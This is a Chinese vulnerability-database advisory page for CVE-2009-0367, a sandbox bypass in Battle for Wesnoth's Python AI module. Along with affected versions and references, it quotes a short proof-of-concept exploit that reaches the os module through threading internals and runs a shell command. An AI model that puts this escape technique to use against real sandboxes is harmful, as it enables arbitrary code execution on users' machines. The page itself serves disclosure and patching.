Wesnoth Battle for Wesnoth PythonAI模块绕过安全限制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117422 漏洞类型 权限许可和访问控制
发布时间 2009-02-25 更新时间 2009-03-12
CVE编号 CVE-2009-0367 CNNVD-ID CNNVD-200903-082
漏洞平台 Linux CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/32837
https://www.securityfocus.com/bid/33971
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-082
|漏洞详情
BattleforWesnoth(韦诺之战)是一款开源的战棋游戏。BattleforWesnoth的PythonAI中的某些白名单python模块错误的导入了本应受限制的python模块,如果用户受骗下载并使用了恶意的添加程序的话,就可能绕过沙盒限制执行任意Python代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/33971/info

Wesnoth is prone to a remote code-execution vulnerability caused by a design error.

Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application.

Versions prior to Wesnoth 1.5.11 are affected.

#!WPY
import threading
os = threading._sys.modules['os']
f = os.popen("firefox 'http://www.example.com'")
f.close()
|受影响的产品
Wesnoth Wesnoth 1.2.8 Wesnoth Wesnoth 1.2.7 Wesnoth Wesnoth 1.2.6 Wesnoth Wesnoth 1.5 Wesnoth Wesnoth 1.4 Pardus Linux 2008 0
|参考资料

来源:www.wesnoth.org
链接:http://www.wesnoth.org/forum/viewtopic.php?t=24340
来源:www.wesnoth.org
链接:http://www.wesnoth.org/forum/viewtopic.php?t=24247
来源:VUPEN
名称:ADV-2009-0595
链接:http://www.vupen.com/english/advisories/2009/0595
来源:gna.org
链接:https://gna.org/bugs/index.php?13048
来源:DEBIAN
名称:DSA-1737
链接:http://www.debian.org/security/2009/dsa-1737
来源:SECUNIA
名称:34236
链接:http://secunia.com/advisories/34236
来源:SECUNIA
名称:34058
链接:http://secunia.com/advisories/34058
来源:packages.debian.org
链接:http://packages.debian.org/changelogs/pool/main/w/wesnoth/wesnoth_1.5.12-1/changelog
来源:packages.debian.org
链接:http://packages.debian.org/changelogs/pool/main/w/wesnoth/wesnoth_1.4.7-4/changelog
来源:launchpad.net
链接:http://launchpad.net/bugs/cve/2009-0367
来源:launchpad.net
链接:http://launchpad.net/bugs/336396
来源:launchpad.net
链接:http://launchpad.net/bugs/335089